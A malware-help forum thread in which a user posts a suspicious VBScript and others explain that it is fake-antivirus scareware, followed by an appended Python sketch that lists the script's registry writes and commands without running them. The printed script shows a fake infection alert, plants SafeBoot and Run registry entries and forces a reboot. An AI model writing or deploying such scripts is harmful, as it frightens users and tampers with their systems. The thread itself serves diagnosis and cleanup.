I have an unfamiliar test.vbs.txt file on my desktop what should I do?

Discussion in 'malware problems & news' started by MrGump, Oct 7, 2011.

Thread Status:
Not open for further replies.
  1. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    394
    I won't double-click it, as I assume this will run whatever is in it, but I did right-click and edit it, and this is what I see:

    Code:
    rem generated by zerokool
    rem written 06-oct-2011
    
    Msgbox "ERROR",32, "INFECTED!"
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set File = fso.CreateTextFile ("C:\virus.html", True)
    File.WriteLine("<head>")
    File.WriteLine("<title> WARNING VIRUS DETECTED</title>")
    File.WriteLine("</head>")
    FileWriteLine("Warning a virus has been detected on your system.")
    
    Dim WshShell, bKey
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\minimal\phuhrenzix", "C:\virus.html", "REG_SZ"
    WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\network\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\network\phuhrenzix", "C:\virus.html", "REG_SZ"
    
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", 1, "REG_BINARY" 
    WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", "C:\virus.html", "REG_SZ"
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "virus.html"
    
    Dim objShell
    Set objShell = WScript.CreateObject("WScript.Shell")
    objShell.Run "shutdown /r /t 0"

    Is this some kind of hoax? *puppy*

    Did it get past my AV?
     
    Last edited: Oct 7, 2011
  2. kjempen

    kjempen Registered Member

    Joined:
    May 6, 2004
    Posts:
    379
    I'm no expert when it comes to Visual Basic, but the Visual Basic script seems to pop up a message box and create a web page ("virus.html") that gets opened even in safe mode (because it modifies your Windows registry). The web page displays a warning message that your PC is infected by a virus. Looks a lot like a rogue/fake antivirus is (or has been) installed on your system. You should do a scan with Malwarebytes Anti-Malware.

    EDIT: Probably a good idea to go through your Windows registry and make sure no registry keys with the word "phuhrenzix" are left.
     
  3. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,050
    Location:
    USA
    If the final extension is .txt then it shouldn't be able to do anything. I would still check the registry as suggested above and make sure that virus.html does not exist on your C: drive. Scan as suggested and delete the file.
     
  4. MrGump

    MrGump Registered Member

    Joined:
    Sep 5, 2009
    Posts:
    394
    Thanks to you both.
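
A static-triage sketch of the approach taken in this thread (reading the script instead of running it), added here as an example and not part of any post: it lists the registry values, files and commands a VBScript refers to, so they can be checked and cleaned up by hand. The function name `triage` and the regular expressions are assumptions of this example; the sample text is an excerpt of the script posted above.

```python
import re

# Excerpt of the script posted in this thread, kept as inert text (never executed).
SAMPLE = r'''
rem generated by zerokool
Set File = fso.CreateTextFile ("C:\virus.html", True)
WshShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\phuhrenzix", 1, "REG_BINARY"
WshShell.RegWrite "HKLM\system\currentcontrolset\control\safeboot\minimal\phuhrenzix", "C:\virus.html", "REG_SZ"
WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\CurrentVersion\Run\phuhrenzix", "C:\virus.html", "REG_SZ"
objShell.Run "virus.html"
objShell.Run "shutdown /r /t 0"
'''

# VBScript allows optional parentheses and spaces between a method and its argument.
PATTERNS = {
    "registry": re.compile(r'\.RegWrite\s*\(?\s*"([^"]+)"', re.IGNORECASE),
    "file": re.compile(r'\.CreateTextFile\s*\(?\s*"([^"]+)"', re.IGNORECASE),
    "command": re.compile(r'\.Run\s*\(?\s*"([^"]+)"', re.IGNORECASE),
}


def triage(script_text):
    """List what a VBScript would write or launch, by reading its text only."""
    found = {kind: [] for kind in PATTERNS}
    seen = set()
    for line in script_text.splitlines():
        stripped = line.strip()
        # Comment lines ("rem ..." or a leading apostrophe) do nothing at run time.
        if stripped.lower().startswith("rem ") or stripped.startswith("'"):
            continue
        for kind, pattern in PATTERNS.items():
            for value in pattern.findall(stripped):
                # Windows registry and file paths are case-insensitive.
                key = (kind, value.lower())
                if key not in seen:
                    seen.add(key)
                    found[kind].append(value)
    return found


if __name__ == "__main__":
    for kind, values in triage(SAMPLE).items():
        for value in values:
            print(f"{kind:9} {value}")
```

The registry paths are reported exactly as the script wrote them, so those are the names to look for when checking the registry.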
     